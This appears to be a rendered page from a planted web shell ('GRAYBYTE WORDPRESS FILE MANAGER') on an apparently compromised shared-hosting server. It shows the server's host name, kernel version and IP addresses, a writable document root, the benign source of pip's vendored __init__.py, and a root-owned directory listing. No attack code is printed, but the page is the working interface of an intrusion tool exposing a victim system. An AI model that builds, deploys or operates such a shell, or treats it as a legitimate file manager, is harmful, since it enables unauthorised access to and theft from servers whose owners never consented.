✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.138
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/lib/python2.7/site-packages/pip/_vendor//__init__.py
"""
pip._vendor is for vendoring dependencies of pip to prevent needing pip to
depend on something external.

Files inside of pip._vendor should be considered immutable and should only be
updated to versions from upstream.
"""
from __future__ import absolute_import

import glob
import os.path
import sys

# Downstream redistributors which have debundled our dependencies should also
# patch this value to be true. This will trigger the additional patching
# to cause things like "six" to be available as pip.
DEBUNDLED = False

# By default, look in this directory for a bunch of .whl files which we will
# add to the beginning of sys.path before attempting to import anything. This
# is done to support downstream re-distributors like Debian and Fedora who
# wish to create their own Wheels for our dependencies to aid in debundling.
WHEEL_DIR = os.path.abspath(os.path.dirname(__file__))


# Define a small helper function to alias our vendored modules to the real ones
# if the vendored ones do not exist. This idea of this was taken from
# https://github.com/kennethreitz/requests/pull/2567.
def vendored(modulename):
    vendored_name = "{0}.{1}".format(__name__, modulename)

    try:
        __import__(vendored_name, globals(), locals(), level=0)
    except ImportError:
        try:
            __import__(modulename, globals(), locals(), level=0)
        except ImportError:
            # We can just silently allow import failures to pass here. If we
            # got to this point it means that ``import pip._vendor.whatever``
            # failed and so did ``import whatever``. Since we're importing this
            # upfront in an attempt to alias imports, not erroring here will
            # just mean we get a regular import error whenever pip *actually*
            # tries to import one of these modules to use it, which actually
            # gives us a better error message than we would have otherwise
            # gotten.
            pass
        else:
            sys.modules[vendored_name] = sys.modules[modulename]
            base, head = vendored_name.rsplit(".", 1)
            setattr(sys.modules[base], head, sys.modules[modulename])


# If we're operating in a debundled setup, then we want to go ahead and trigger
# the aliasing of our vendored libraries as well as looking for wheels to add
# to our sys.path. This will cause all of this code to be a no-op typically
# however downstream redistributors can enable it in a consistent way across
# all platforms.
if DEBUNDLED:
    # Actually look inside of WHEEL_DIR to find .whl files and add them to the
    # front of our sys.path.
    sys.path[:] = glob.glob(os.path.join(WHEEL_DIR, "*.whl")) + sys.path

    # Actually alias all of our vendored dependencies.
    vendored("cachecontrol")
    vendored("colorama")
    vendored("distlib")
    vendored("distro")
    vendored("html5lib")
    vendored("lockfile")
    vendored("six")
    vendored("six.moves")
    vendored("six.moves.urllib")
    vendored("packaging")
    vendored("packaging.version")
    vendored("packaging.specifiers")
    vendored("pkg_resources")
    vendored("progress")
    vendored("retrying")
    vendored("requests")
    vendored("requests.packages")
    vendored("requests.packages.urllib3")
    vendored("requests.packages.urllib3._collections")
    vendored("requests.packages.urllib3.connection")
    vendored("requests.packages.urllib3.connectionpool")
    vendored("requests.packages.urllib3.contrib")
    vendored("requests.packages.urllib3.contrib.ntlmpool")
    vendored("requests.packages.urllib3.contrib.pyopenssl")
    vendored("requests.packages.urllib3.exceptions")
    vendored("requests.packages.urllib3.fields")
    vendored("requests.packages.urllib3.filepost")
    vendored("requests.packages.urllib3.packages")
    vendored("requests.packages.urllib3.packages.ordered_dict")
    vendored("requests.packages.urllib3.packages.six")
    vendored("requests.packages.urllib3.packages.ssl_match_hostname")
    vendored("requests.packages.urllib3.packages.ssl_match_hostname."
             "_implementation")
    vendored("requests.packages.urllib3.poolmanager")
    vendored("requests.packages.urllib3.request")
    vendored("requests.packages.urllib3.response")
    vendored("requests.packages.urllib3.util")
    vendored("requests.packages.urllib3.util.connection")
    vendored("requests.packages.urllib3.util.request")
    vendored("requests.packages.urllib3.util.response")
    vendored("requests.packages.urllib3.util.retry")
    vendored("requests.packages.urllib3.util.ssl_")
    vendored("requests.packages.urllib3.util.timeout")
    vendored("requests.packages.urllib3.util.url")


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
3 Mar 2024 8.23 PM
root / root
0755
cachecontrol
--
3 Mar 2024 8.23 PM
root / root
0755
certifi
--
3 Mar 2024 8.23 PM
root / root
0755
chardet
--
3 Mar 2024 8.23 PM
root / root
0755
colorama
--
3 Mar 2024 8.23 PM
root / root
0755
distlib
--
3 Mar 2024 8.23 PM
root / root
0755
html5lib
--
3 Mar 2024 8.23 PM
root / root
0755
idna
--
3 Mar 2024 8.23 PM
root / root
0755
lockfile
--
3 Mar 2024 8.23 PM
root / root
0755
packaging
--
3 Mar 2024 8.23 PM
root / root
0755
pkg_resources
--
3 Mar 2024 8.23 PM
root / root
0755
progress
--
3 Mar 2024 8.23 PM
root / root
0755
requests
--
3 Mar 2024 8.23 PM
root / root
0755
urllib3
--
3 Mar 2024 8.23 PM
root / root
0755
webencodings
--
3 Mar 2024 8.23 PM
root / root
0755
__init__.py
4.561 KB
21 Apr 2022 6.08 PM
root / root
0644
__init__.pyc
3.133 KB
21 Apr 2022 6.08 PM
root / root
0644
__init__.pyo
3.133 KB
21 Apr 2022 6.08 PM
root / root
0644
appdirs.py
21.844 KB
21 Apr 2022 6.08 PM
root / root
0644
appdirs.pyc
20.162 KB
21 Apr 2022 6.08 PM
root / root
0644
appdirs.pyo
20.162 KB
21 Apr 2022 6.08 PM
root / root
0644
distro.py
37.45 KB
21 Apr 2022 6.08 PM
root / root
0644
distro.pyc
35.108 KB
21 Apr 2022 6.08 PM
root / root
0644
distro.pyo
35.108 KB
21 Apr 2022 6.08 PM
root / root
0644
ipaddress.py
78.297 KB
21 Apr 2022 6.08 PM
root / root
0644
ipaddress.pyc
75.988 KB
21 Apr 2022 6.08 PM
root / root
0644
ipaddress.pyo
75.803 KB
21 Apr 2022 6.08 PM
root / root
0644
pyparsing.py
218.917 KB
21 Apr 2022 6.08 PM
root / root
0644
pyparsing.pyc
224.711 KB
21 Apr 2022 6.08 PM
root / root
0644
pyparsing.pyo
224.711 KB
21 Apr 2022 6.08 PM
root / root
0644
re-vendor.py
0.755 KB
21 Apr 2022 6.08 PM
root / root
0644
re-vendor.pyc
1.414 KB
21 Apr 2022 6.08 PM
root / root
0644
re-vendor.pyo
1.414 KB
21 Apr 2022 6.08 PM
root / root
0644
retrying.py
9.738 KB
21 Apr 2022 6.08 PM
root / root
0644
retrying.pyc
9.966 KB
21 Apr 2022 6.08 PM
root / root
0644
retrying.pyo
9.966 KB
21 Apr 2022 6.08 PM
root / root
0644
six.py
29.393 KB
21 Apr 2022 6.08 PM
root / root
0644
six.pyc
30.318 KB
21 Apr 2022 6.08 PM
root / root
0644
six.pyo
30.318 KB
21 Apr 2022 6.08 PM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF